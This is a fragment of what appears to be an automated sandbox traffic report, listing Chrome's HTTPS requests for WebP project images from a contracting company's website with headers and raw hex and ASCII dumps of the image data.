                                              2024-09-27 06:20:18 UTC8000INData Raw: 52 52 d6 f9 b1 88 cf fb e4 92 13 6c 83 84 94 5a 72 61 c4 bb 8b 6d 0c 0c f8 d6 7b f4 0d 36 37 fa 86 de 63 2a 3b c9 00 61 9c e2 52 3b bd 38 55 1c ee 32 3c a0 3c 95 40 0f 0b 9f 45 78 db 88 d1 4c e3 1a f0 e6 c0 e6 3a ae 65 b6 38 4d 5c ef 52 8e 9a ad 80 2e 8d 35 d1 54 66 d7 30 e9 38 9d b0 a0 3d ac 4c 9c 53 80 2c 75 a2 69 b9 7f 51 ec 13 8c 7e a0 88 6d 19 f1 2d b5 2e 07 a5 46 29 5e 54 de 3a 2e 2b 39 00 d5 ee 6b be 4c c6 fe 8e 4d 25 e4 75 86 9a 36 9c 75 6d 73 54 9e b2 59 82 65 ca a6 d8 3a e0 be 5b 2d 43 68 eb 97 af ec ce 1f 5c f9 47 de 1a ec 95 d2 66 5c 50 44 c1 8d 77 04 a4 d0 57 9a c3 16 fb ab 31 10 44 7f 58 9c 31 53 52 8e 51 8d 88 7c c2 56 1e 38 90 dc 68 87 f2 30 c3 b4 dc ce 6b 4e 6c 60 60 a6 68 6a 53 e7 45 3d e9 59 9f 50 17 9f 18 25 94 52 0a 1c 82 a3 de 61 1e
                                              Data Ascii: RRlZram{67c*;aR;8U2<<@ExL:e8M\R.5Tf08=LS,uiQ~m-.F)^T:.+9kLM%u6umsTYe:[-Ch\Gf\PDwW1DX1SRQ|V8h0kNl``hjSE=YP%Ra
                                              2024-09-27 06:20:18 UTC8000INData Raw: 0c b6 e4 a0 be 2e 2e ad 84 43 57 b2 93 f8 90 90 87 6a b4 90 90 45 7f b4 44 b5 c3 5c ca 6b 20 69 3b 46 7a 63 12 7a db 48 05 bc 3c 9b 62 68 ac 8f 39 16 eb 8a 03 3c a7 39 15 3a ee 23 59 d0 d1 e8 69 fb e1 c5 0e 9e 78 1c 98 71 4e 45 61 18 75 19 0c 9c 9c 45 d4 1b a2 36 bd 00 90 be 52 66 4c 6b 9d fb a1 8c f0 bb 1a 55 ed 2b ef b5 04 14 49 3a 99 86 51 d2 0f c6 2e 65 ff 6a a9 36 48 fa f0 43 b1 af aa b5 8d 38 68 de 68 6c d9 54 ce c3 e5 8a ad cf 8c 44 48 7a 10 97 a1 38 c4 51 b1 0a 4a 86 f2 0b dd 8c 8f 9d 35 43 73 a2 7d 41 f0 43 06 6e 72 9a ec d0 48 b8 28 ae 33 51 0b d6 15 79 d6 57 c9 4c bb bb 6f 7a 7d 0d db ae 71 69 28 b2 21 69 7c 00 89 63 26 bc ad 47 19 cb 7d 0d cc 46 9d 07 bc 78 2b a7 ad 17 e5 9f 91 6c 3f 8a 42 c9 e0 1f 6a e0 f0 9f a0 ed 52 4a 36 2e 09 92 37 04 02
                                              Data Ascii: ..CWjED\k i;FzczH<bh9<9:#YixqNEauE6RfLkU+I:Q.ej6HC8hhlTDHz8QJ5Cs}ACnrH(3QyWLoz}qi(!i|c&G}Fx+l?BjRJ6.7
                                              2024-09-27 06:20:18 UTC8000INData Raw: e2 dc 21 c4 84 31 8e ce b8 b4 61 3e 8e a4 ca 0a 87 68 bb f6 65 bc 26 6d c7 8d 06 36 e3 c5 54 b7 e6 8f 2a 44 c2 2e 7a a5 46 df 64 6f 22 12 6f c2 09 49 ee f7 93 c7 3a a1 80 37 0f ee 08 ed b7 a8 fc 4a 92 83 74 6f bc 2e f0 d4 51 1c bb 8b ba 53 26 4c 78 ac b0 aa e2 0d 37 20 4b 1c 79 e1 43 42 d6 2c 5f 6b ef e2 64 de a0 52 41 cf 73 97 e0 16 e3 5c 61 0e 3b 4e 89 64 46 a5 7d 79 45 9b 28 9b 88 ab a7 11 29 f8 b7 f5 2e 4f 82 68 9a 0b 86 97 96 62 6f a2 4f 0e 2a 6a 43 e9 4c da 9f 01 a7 64 95 e8 29 f0 6c ef 28 0f 61 81 61 6d cc 1c 28 22 90 4b ce da 4b 6c 83 f1 9a 76 cf da 97 d4 1b bc bd 26 69 e4 db c6 34 16 5f aa 28 11 97 15 61 74 8d 58 d0 f2 8a 48 65 fa 0b 89 61 76 fa 31 bc 60 5e b5 d3 ae b3 f4 91 12 b6 69 3d 1b 08 30 a1 f3 8f 73 2f f9 68 7c 5f 33 31 ef e6 1b 34 b7 98
                                              Data Ascii: !1a>he&m6T*D.zFdo"oI:7Jto.QS&Lx7 KyCB,_kdRAs\a;NdF}yE().OhboO*jCLd)l(aam("KKlv&i4_(atXHeav1`^i=0s/h|_314


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              112192.168.2.465448173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:18 UTC465OUTGET /uploads/projects/15/6a0a747aec6891a7650e250b247f7939.webp HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:18 UTC261INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:18 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Tue, 10 Jan 2023 10:48:37 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 45240
                                              Connection: close
                                              Content-Type: image/webp
                                              2024-09-27 06:20:18 UTC7931INData Raw: 52 49 46 46 b0 b0 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 00 00 00 00 ce 04 00 a2 03 00 56 50 38 20 3c b0 00 00 f0 ea 03 9d 01 2a cf 04 a3 03 3e e9 6e af 53 29 26 33 ac 24 72 4a 5a 70 1d 09 69 41 8b c5 67 bb fd 5c fb b9 c6 43 5f a4 78 80 fd 63 e1 c2 3d 0e f3 1c f5 7f eb f4 d7 3f 12 b1 9b 31 64 36 4f d3 51 a6 38 68 79 14 f4 c2 f1 cb a9 1d 0d 2c 77 ff 79 dd b9 c5 e5 91 2f ab 79 cc 5f b7 fd 77 ff 5f 9a 8f aa f5 ff fa 37 62 2f fa 59 37 fb 5f 07 7f bd 7f 24 cf 47 f8 5e 05 fe b7 fc d7 ec ef b0 8e 24 f6 a3 6a 7f f0 ff fa 7f b7 f6 11 f6 9f ee 3f b4 be dc ff b3 e7 8f f9 7e a0 bf e2 fd 2d f1 3d f5 ff 61 6f e7 df eb 3d 64 7f e8 f3 e1 fb 37 9d d7 5e 52 52 fa b6 2d 60 8c cf a7 8a 02 25 d4 10 11 2e a0 80 89 75 04 04 4b a8 20 23 57 f4 f1 40 44 ba 82 02 25 d4 10 11 2e
                                              Data Ascii: RIFFWEBPVP8XVP8 <*>nS)&3$rJZpiAg\C_xc=?1d6OQ8hy,wy/y_w_7b/Y7_$G^$j?~-=ao=d7^RR-`%.uK #W@D%.
                                              2024-09-27 06:20:18 UTC8000INData Raw: 2f e4 e0 88 c2 6d 27 25 7f 16 02 3a 91 ed ec fc 9b 1d c1 79 96 e5 c8 0f f9 c6 a8 88 39 fa f1 b7 4d cd 66 7a b9 d5 ae 4e 02 8e 64 f4 2b 26 e6 12 87 a9 46 14 b1 d6 f3 3d b0 bf 24 27 90 38 91 16 96 e1 0f cf 3b 03 54 b7 6f 9c 00 3c 86 0b c0 1e 7c ee ca 55 3b 61 b4 4d e7 c2 9f 33 7d 8e ec fe 78 c2 66 a2 e0 b6 9f d1 64 c8 23 77 a1 4a 02 9f df eb 29 27 c2 c3 38 b1 c0 07 8f a0 22 75 2e 48 f7 d3 25 64 78 d9 76 be df 08 00 00 fe f1 b8 c0 b7 0f 43 a0 56 d6 56 56 b7 b7 20 93 69 2b d9 a0 db 1d 72 7c d3 ab bd b9 b7 dd ae 32 9e 34 77 b4 8e ab 86 7b cc 3c 77 d3 79 62 09 b2 ef b0 78 60 ed ac f2 70 fe 75 9a d9 0c 75 e4 00 4e de 04 32 b4 7f 25 ef 68 98 dd ca db f8 f9 2b 82 75 db f0 da 50 07 79 13 c0 08 1d 46 d0 ba 0d cb 23 c8 b0 99 82 73 80 b0 a5 25 05 8a 75 75 12 68 30 9f
                                              Data Ascii: /m'%:y9MfzNd+&F=$'8;To<|U;aM3}xfd#wJ)'8"u.H%dxvCVVV i+r|24w{<wybx`puuN2%h+uPyF#s%uuh0
                                              2024-09-27 06:20:18 UTC8000INData Raw: 9f d7 39 72 5e e6 35 f9 aa 20 86 92 d6 5f d8 cc f2 c0 4b 88 88 00 d6 fe 9d 17 ac 18 41 59 ac 3a 53 e3 b8 85 68 41 68 fd ef 6f 6e c7 30 20 a0 54 43 b8 59 20 4d 00 81 c6 89 b3 83 a7 80 b7 38 d1 37 61 cb 36 35 b1 33 1f 4d 95 c4 56 69 df 42 8a 6e c4 13 ad 12 f7 09 28 ef 1c 1e df 6d c7 0d 21 46 e9 c9 42 bb e1 ad 58 ec 4e bb b3 b6 43 8e 20 17 c3 1c da 23 af 86 60 08 df ab 15 81 02 0b 54 fc b8 98 e8 cd 2d eb 77 1e 47 70 70 99 47 61 c9 bc 60 de 68 a5 bb 87 5d 8d 0a c5 e2 f8 ec c8 3e 63 19 9f bc ea 7e b7 e8 42 13 e4 80 56 1a e2 bb a8 ea 99 28 01 03 27 1a 6c 9c f0 86 a2 3c bb a7 d4 3c 2b 59 31 3f 6d c6 31 2f b1 f8 6a 42 c3 77 f9 43 05 bb fb 04 96 99 c5 e9 da 2c da 30 6b a3 26 f3 06 7b e6 24 51 2b be e2 d7 d4 4f 82 52 70 90 34 05 99 75 4b 18 26 e5 cf e3 38 e8 cd d8
                                              Data Ascii: 9r^5 _KAY:ShAhon0 TCY M87a653MViBn(m!FBXNC #`T-wGppGa`h]>c~BV('l<<+Y1?m1/jBwC,0k&{$Q+ORp4uK&8
                                              2024-09-27 06:20:18 UTC8000INData Raw: 58 14 89 9d ef d1 78 99 f5 7e 5b 4f 46 cc 4a 4d ce 6a ac b1 a4 fe 99 48 33 aa e5 85 3c 31 82 23 f2 c3 56 5c 43 af f7 e7 13 ec 96 f5 a6 31 6e 69 3e 51 81 c3 e7 86 22 29 e4 dc 07 0e 98 cb b5 62 4e 6b 10 0b 59 1d 30 f3 4f f9 1e b0 82 32 19 15 c5 21 a8 9f 97 f0 ec 61 d4 e7 5e 83 55 26 f7 3a f7 32 cf 3f 06 e7 88 a2 0d 9e 7d fd 5c c7 9e ba d2 cb ed fa 4c 68 cf b3 e8 8c b3 1c a8 e1 e4 e6 b4 b2 95 fd 2b 45 a5 ea ce e7 fa 07 f4 4b 54 9e 22 a3 6a b1 44 2d a9 82 1e 85 0a c9 6b 8c 02 3d 1a 2b 64 78 15 20 ad ad 21 7f 0f 2a 31 01 dc a6 ad c8 26 98 61 fb a2 12 ca be 75 c7 16 86 16 46 67 95 6d 66 ee fc 96 ac 2e e6 fe 87 9f c4 a2 f1 b7 99 d8 a2 16 51 00 af c7 16 df 65 45 1b 14 69 b2 3e dc e4 26 dd 9c 97 04 18 30 6e 32 5e 33 1a 28 29 7f 3c 09 c1 45 f4 7a 99 af f6 fa 6b 00
                                              Data Ascii: Xx~[OFJMjH3<1#V\C1ni>Q")bNkY0O2!a^U&:2?}\Lh+EKT"jD-k=+dx !*1&auFgmf.QeEi>&0n2^3()<Ezk
                                              2024-09-27 06:20:18 UTC8000INData Raw: f2 99 87 b6 53 7a 55 ba c3 ad b0 9e 04 5e 1e 50 45 c7 2a 32 78 11 aa c8 ae 47 f3 ac 0a 78 e3 ed 31 ae c3 3c 95 4a 8e 09 c4 8b 86 e8 29 68 1a 81 76 53 d6 cb b4 74 30 03 c0 21 b3 71 e0 9b 94 53 14 2a be 2d 0c d3 2b bc 30 8e 7a 22 71 ba 6c 46 e2 97 ca 2b 8a a4 55 92 47 3b 68 a4 17 ef 5a bc 0d 00 23 59 23 06 86 bf ee 2b c8 c1 e0 ec 54 03 ff cc e7 08 60 5f bd 5b d4 57 10 2f bb 0e 6e bd 49 e9 4c ef 4f af fa ee 34 d8 3c 51 4f 84 36 a3 65 ce 88 b2 69 57 19 58 77 53 20 ca ab 79 9a e4 a3 27 33 53 6d 22 b9 2d e5 a9 c4 00 b2 a8 f1 4b 3d 7b 28 7b 8a 34 18 fe 00 09 60 4f 85 0b 33 44 66 af ad 18 59 10 70 be 53 47 16 7b d3 9d dc ac 11 80 bc fe d3 bc 5e 45 5b 24 c0 4c 03 ef 0b 37 3c 05 ad 6f 96 35 26 7c 5f 09 41 23 f6 fc 7f f9 27 86 55 27 52 35 77 fa 41 94 0c 55 55 f6 85
                                              Data Ascii: SzU^PE*2xGx1<J)hvSt0!qS*-+0z"qlF+UG;hZ#Y#+T`_[W/nILO4<QO6eiWXwS y'3Sm"-K={({4`O3DfYpSG{^E[$L7<o5&|_A#'U'R5wAUU
                                              2024-09-27 06:20:18 UTC5309INData Raw: 4b 12 f2 02 6f df f1 84 bb e9 64 cb b8 e9 00 c2 e8 a7 ec 14 8c 37 81 f3 a6 08 10 31 30 ea cf de f0 d8 b0 d6 2d 21 c0 3a a5 9f 0f 97 26 d7 dd d3 01 f8 80 ab 0b 9f 2e ad 63 7a 17 25 ec 75 f4 60 a2 08 8d 23 97 cb 52 cc f3 71 03 cd 5b b5 87 cc ac ff a6 b8 e7 37 84 58 1c 36 eb 0f d3 3f e0 ac 11 e0 02 db 9e 6f f3 26 ac df ea b3 7c 3d 42 3e 67 81 60 9d fb eb 17 51 da 9e dd d4 7b 5f b0 00 2f 9e 80 40 97 c5 3a da 14 0c 04 c4 d3 1e 72 ad 6b c8 a4 47 b7 83 41 d3 24 73 f9 07 c3 7d 5b 09 3f 0a 31 78 d9 17 fa 97 43 78 b4 03 3c 2c 1c 8f 64 d7 83 f7 a4 c0 bc 13 2f ff bd 9e 08 ee 4f 69 31 72 7b 69 3a 8b 32 ec cd b0 33 67 39 4e 78 62 5c 41 0b 15 4f b4 d8 3f 31 13 9e 66 f2 01 68 fd ed fb 65 cd b6 1d f8 e3 e7 de 18 68 bb dd e1 e9 c7 31 5b 20 32 28 d3 2d d1 03 da 18 dc 29 a9
                                              Data Ascii: Kod710-!:&.cz%u`#Rq[7X6?o&|=B>g`Q{_/@:rkGA$s}[?1xCx<,d/Oi1r{i:23g9Nxb\AO?1fheh1[ 2(-)


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              113192.168.2.465446173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:18 UTC465OUTGET /uploads/projects/10/579de64f97d717521a5fc6fcc0eaa118.webp HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:18 UTC261INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:18 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Mon, 09 Jan 2023 14:27:51 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 56572
                                              Connection: close
                                              Content-Type: image/webp
                                              2024-09-27 06:20:18 UTC7931INData Raw: 52 49 46 46 f4 dc 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 00 00 00 00 ce 04 00 a2 03 00 56 50 38 20 80 dc 00 00 d0 3e 05 9d 01 2a cf 04 a3 03 3e e9 6e b0 52 a9 26 25 2b a5 51 fa c1 70 1d 09 67 6e dc d8 da df 6f c6 53 f4 fb 1e a3 b8 7a c5 4b ae f2 d3 fe 87 9e 37 f5 3a 74 b3 cb fa 5a 3a 5d e7 e5 ff 36 3f 6e bf da ff de f5 19 e6 bc e0 85 c8 f2 ed 8c fe eb fd bf 50 73 bd f4 0b ee 3c a3 fe 2f f9 6f 35 bf f5 7d 62 7e a7 f6 03 fd 63 fd 5e f7 1b ea 53 f9 ef a2 0f e7 ff e6 7f 71 7d e8 3f ec 7a cf ff 09 ea 01 fd 27 fe 2f 5b 1f a0 07 97 37 b4 37 f6 7f fc 1e 96 9a 9f 9f 69 f2 ab f5 bf f3 7f f9 7f bb f2 af f4 cf d0 fd d3 fb ba e0 1f ee 7b bc f6 f4 ff 8b bf df dd bf b4 f4 14 fd 93 c7 52 18 dd 07 a0 6f d0 ff c4 7a 6e fe 87 9d 5f e1 7f bc f6 02 ff 07 e9 6f fe bf 1c 6f
                                              Data Ascii: RIFFWEBPVP8XVP8 >*>nR&%+QpgnoSzK7:tZ:]6?nPs</o5}b~c^Sq}?z'/[77i{Rozn_oo
                                              2024-09-27 06:20:18 UTC8000INData Raw: 57 af e0 30 06 97 75 4a 9b 53 78 23 38 02 4f 3e 17 4e 05 ae 84 2c df ab ec 04 ce 35 a8 68 fb c2 13 91 a2 0f 21 ce e3 3e 0a 8d 8a a4 a7 1e b9 55 16 ff 9f 07 69 d8 db 14 a0 55 60 ba d0 82 f1 09 df ff 73 ff f6 07 af cd 3a d3 e2 1b af bb b2 68 6a 90 f8 9e 55 01 23 98 bf 57 8a 53 75 72 c9 1d 33 19 85 ae c2 a3 21 4a 23 e3 c4 d9 45 08 3b 03 40 37 a2 01 6f 4b db 5c e4 f4 bf 65 c0 41 14 c5 19 e5 c0 b0 01 d2 7c 1c 79 06 68 76 01 d3 81 7c ad 86 5d ba b2 87 25 77 7f fc a8 8f 65 70 97 64 7a 74 3c d6 20 e8 b5 65 fb 7d 9e a2 50 f3 41 64 19 26 e7 84 09 6a 09 11 66 b9 42 0f c3 d2 94 60 41 93 97 80 f1 85 73 46 69 30 53 bb 2b 6d 25 2f 7e 44 1f 6a 6c ad 8d 1a 8c 18 aa a4 94 b7 4f e1 f2 a7 4d 31 92 de 28 ac 90 05 71 2b 86 f4 bc 60 57 80 6b d1 40 46 85 43 04 b6 6b d4 72 61 9f
                                              Data Ascii: W0uJSx#8O>N,5h!>UiU`s:hjU#WSur3!J#E;@7oK\eA|yhv|]%wepdzt< e}PAd&jfB`AsFi0S+m%/~DjlOM1(q+`Wk@FCkra
                                              2024-09-27 06:20:18 UTC8000INData Raw: d8 42 44 a0 52 b5 ce 16 83 61 ee 72 99 a1 ca 1e c9 d1 d1 43 2a 87 c4 bd 8c 92 0d 72 07 34 ab 8f dd fb c9 37 a0 e6 9a 20 6a 17 ba d3 bc 15 c4 5d b4 85 f9 ae 7f cf 04 45 b7 d6 c5 5b a4 aa c1 7c e0 64 5e e1 43 cb 37 dc 5d 8a 0d 4b da bd f9 e7 2e 3e 9c 8b cd 1e 6e c5 ce dd 17 9c b3 2e dc 13 11 3d 6e 86 d0 ca 63 d6 10 e9 ac 22 ba c7 58 9b 2f c3 66 69 78 d2 10 8a dc ac 86 f2 13 31 5c c8 80 10 b9 6e 9f 14 c3 cc 6c fa 7e 50 ef bc 08 f8 33 cf 08 82 fd 6d 56 f1 74 37 31 5e 78 3e ec 6f 2a 9f 7e f5 a6 6b 3b 31 17 7e a2 b1 35 f1 d2 11 34 58 e4 f1 dc 24 07 db 88 0f 8e 7a 51 eb 53 8e 6e b0 b7 59 dd 27 a0 3f c0 46 75 a2 60 03 29 b9 d5 0a fc f1 e7 bd e4 7c 39 71 3f d0 0f 24 09 c4 50 4d cc 31 ef 66 e5 b6 67 a3 c7 5f 3d 4a 5e ad 2a 8e a8 b9 c5 b4 1d 80 94 62 63 74 14 88 3f
                                              Data Ascii: BDRarC*r47 j]E[|d^C7]K.>n.=nc"X/fix1\nl~P3mVt71^x>o*~k;1~54X$zQSnY'?Fu`)|9q?$PM1fg_=J^*bct?
                                              2024-09-27 06:20:18 UTC8000INData Raw: c1 01 c7 b2 00 df a5 9b cc d5 0a d4 7b 9b 9b 7c 4a 99 b8 43 22 f3 e5 19 bb d0 fe 6c 37 cf 21 33 37 17 82 2e 06 a2 59 89 03 74 ec 69 20 6e 48 90 26 74 dd 5b e2 24 9c 78 7c 7c 96 99 08 8f c5 2d 4a 0c b8 35 68 0d 43 62 56 0e b7 86 0d 6c e3 76 77 59 cd 6f e5 57 46 89 8b e4 8c e2 84 00 7d 34 55 69 6a be cc c1 7c fa c1 0c c1 10 76 14 95 f8 06 a0 86 ad 28 4e bd d8 1b 93 22 d1 9a 76 c7 40 06 f8 06 ec f1 39 a5 6b 91 ab b6 c2 cb 5c 2e 23 2d c7 fe fc 3e b4 77 ad d9 be 25 be ef ce 6b 43 9b 2e af 9a ff d8 94 88 35 e4 4e a8 4a b8 b3 d8 65 ac 70 9f 37 f8 bc 5b d7 a1 c3 50 3a 16 58 4f 48 c7 19 88 49 d6 38 d8 08 6c 35 4a 11 e2 63 b1 71 78 2d 80 e8 44 0d 85 29 e8 bd 91 e6 4e be c7 cb 9f 6d b7 60 88 39 54 4b 32 3e 4a 67 b5 17 7a 2d 56 88 cc 09 0a cd 06 35 92 74 b4 52 af 81
                                              Data Ascii: {|JC"l7!37.Yti nH&t[$x||-J5hCbVlvwYoWF}4Uij|v(N"v@9k\.#->w%kC.5NJep7[P:XOHI8l5Jcqx-D)Nm`9TK2>Jgz-V5tR
                                              2024-09-27 06:20:18 UTC8000INData Raw: 9e bb 65 3d 8d ca 9a 90 55 0d 78 bc 2f c6 6e 12 67 a9 21 40 4a 82 cf af 78 5e fa 76 fa a4 3c df 4e 02 f1 fa 4d d4 ce 1d c1 42 96 c2 73 71 23 9a 22 c4 9f cb a3 d4 17 ef b0 53 7a df 70 34 16 2c d8 db bd 9c 34 53 a6 57 29 2c 50 e6 da 94 51 7f b9 d7 0a 4a 1c 4d b3 df 0f 4a d4 f8 06 9d 15 29 58 0b f8 a1 a4 75 80 9e 06 08 33 c8 7a 31 6a dc d4 db a9 fa 89 69 7a 1f 75 eb 51 a1 f9 3a 49 68 05 f5 d9 68 94 21 f0 95 d9 87 cb 25 3b dc 3c ce 74 ab 90 75 8e fd 2f a5 68 fb 1b 3f 06 48 05 2b 45 27 6d ec bf 07 b7 8f ed 36 d7 b6 02 b8 c6 44 63 73 bb 74 77 bf c8 dc 03 6d 0a 6f 82 81 11 cb 49 62 fb e7 fc 91 00 cf 2a 88 59 5b e0 99 77 51 e7 a6 04 3e 03 dc 36 9d 0f 99 a8 75 83 75 87 5c 0a 9c 44 2c 2c ee 42 63 d1 e9 bf 9c 1e 89 f2 95 af ab 7d 6c 2b 34 87 91 9d 5b ee 49 a0 f2 d4
                                              Data Ascii: e=Ux/ng!@Jx^v<NMBsq#"Szp4,4SW),PQJMJ)Xu3z1jizuQ:Ihh!%;<tu/h?H+E'm6DcstwmoIb*Y[wQ>6uu\D,,Bc}l+4[I
                                              2024-09-27 06:20:18 UTC8000INData Raw: b8 c3 8d 87 87 ed ff f2 1a 5d 1f 85 cd 78 c7 63 ff 3f 64 d0 dd 45 9e 65 27 6d 1c e0 1f cc 27 df e0 a2 7c 44 6d dd d8 3c af 1d 02 44 d1 15 a7 ab de 6a 9a 68 6d 3a f0 9e bd c5 eb 75 52 a5 09 16 82 eb a0 31 d1 d3 7e a1 c1 ec 67 dd 24 fc 48 af 13 17 53 7f f0 18 d5 f9 9f 3a 63 a7 60 ec 08 ee f5 dc 10 7d a0 6b a3 42 30 35 6e 8f 07 21 a0 60 dc 77 74 29 04 76 80 73 f4 0c 72 12 6f 8c a9 3d be 8d 0b 8e 3e 54 c2 b2 62 8b fd 42 bf 44 4d 6e e5 08 0e 9a 66 a6 cb d9 5f 85 eb f3 b9 6e d2 6a de 4a d1 3e bf 65 0b d9 da 96 b4 ad 0e 10 25 2a 7f 4b 1a 18 b0 99 53 53 82 ff 08 5f 29 b8 50 87 2f 58 2f 6f 2a 57 c7 b2 ff 73 e3 99 3b a4 1e 12 13 4f 91 f7 e2 2f ce b4 04 d5 82 98 bc cf cb f4 f7 5d 63 21 92 15 c2 d9 0d 3e 1b f1 03 1b ff 0e b3 f0 5a a5 80 f5 69 ac c9 f2 96 50 0a 36 6e
                                              Data Ascii: ]xc?dEe'm'|Dm<Djhm:uR1~g$HS:c`}kB05n!`wt)vsro=>TbBDMnf_njJ>e%*KSS_)P/X/o*Ws;O/]c!>ZiP6n
                                              2024-09-27 06:20:18 UTC8000INData Raw: 8c 0b 9d a8 2b 64 5d 8d 30 32 5c 5f 42 91 f8 0b 8c 2d 32 f9 45 8d 9c f8 8f d6 e3 e2 7b 23 71 78 9c c3 39 95 3a bf c8 7d fa f4 37 63 bb 67 27 78 5d 08 f8 a9 6f c1 69 41 2b 6b f7 04 c0 a3 2c f8 bd 0c 9e 4d b5 12 29 df 00 94 fd 06 0e 80 e5 f3 12 ef ee f8 0c ca 89 ec 9a 87 36 64 5c 9f 9a 28 dd 82 fd 95 fc 86 26 7f 23 df fa e3 4d 86 de 5a a3 c6 49 8f f3 5b d8 ba 66 6a 9e 0b b5 c8 77 61 8e 94 0a 7f ce 97 7f 21 0c 36 f0 b1 90 23 76 f1 da a4 f4 3b c4 05 c6 d7 1c 7d b7 35 c9 c0 1b 18 d4 59 c1 36 8e 16 52 ad c1 f3 d1 be ba d4 50 42 49 22 9e 1e 47 b3 0c 84 35 a7 4e 9a d2 d5 94 ca b0 8c 56 10 56 26 9f 0d 28 9a 84 dd 01 6f 7b fa 0a 20 45 7f dc 94 6b 30 e6 0b 4b 53 29 6d f2 9c 7d c8 8c e9 c4 1d 64 4a 4f 59 a6 86 fc 48 fa 13 17 54 bb e4 45 e7 b9 69 a1 44 04 9d 92 07 38
                                              Data Ascii: +d]02\_B-2E{#qx9:}7cg'x]oiA+k,M)6d\(&#MZI[fjwa!6#v;}5Y6RPBI"G5NVV&(o{ Ek0KS)m}dJOYHTEiD8
                                              2024-09-27 06:20:18 UTC641INData Raw: dd 98 b8 92 5d 12 ac 03 f2 17 a0 3b 79 55 18 fc 67 f0 df 2b 46 ff db c9 7b cd 81 41 d7 84 66 3f 47 ef 67 bc 06 74 bd 49 13 13 d9 fd 93 ab d7 ec c2 df 6e 8f a6 a3 b6 95 2d c3 f7 d7 83 1e 56 f5 c7 e5 f9 18 ef 3e e7 cc 84 11 f6 44 42 39 f1 6f cf f4 5e 46 bd 86 f1 c4 cd 8b 23 3e 3d ab ce 1e a7 a6 a3 12 9f 8b df c5 1e 23 8d 89 4c e8 f3 1c c7 d0 fd fc d2 a2 1e 6a ba 75 d4 0e d8 14 0f b2 20 b4 50 aa 0a 64 c8 76 ba 24 19 a2 ce f7 78 9b ad d8 19 c3 29 88 26 4e f3 01 8c aa fa 06 8c b1 1d 95 d9 0e a0 b4 29 c6 3e f0 05 a1 79 63 5f 84 f9 0c 0c 6b 9a 3d 24 c5 72 e3 ab 98 c2 04 ef 8c fa 98 a3 fd fe f8 18 6f e6 7a 18 29 4c 67 2d c9 6a 11 47 1b 13 98 6b ba 16 05 20 f4 5a d7 74 fa a3 84 53 1a f5 0b 97 3c e3 9a c4 ec b6 6e 71 1b 19 8d e7 ec bd 7d 57 5f 70 2d 5f 8b f6 0e d7
                                              Data Ascii: ];yUg+F{Af?GgtIn-V>DB9o^F#>=#Lju Pdv$x)&N)>yc_k=$roz)Lg-jGk ZtS<nq}W_p-_


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              114192.168.2.465450173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:18 UTC465OUTGET /uploads/projects/34/2df040a4c38aa8d8468943fbef9cc703.webp HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:18 UTC262INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:18 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Tue, 10 Jan 2023 12:05:31 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 126100
                                              Connection: close
                                              Content-Type: image/webp
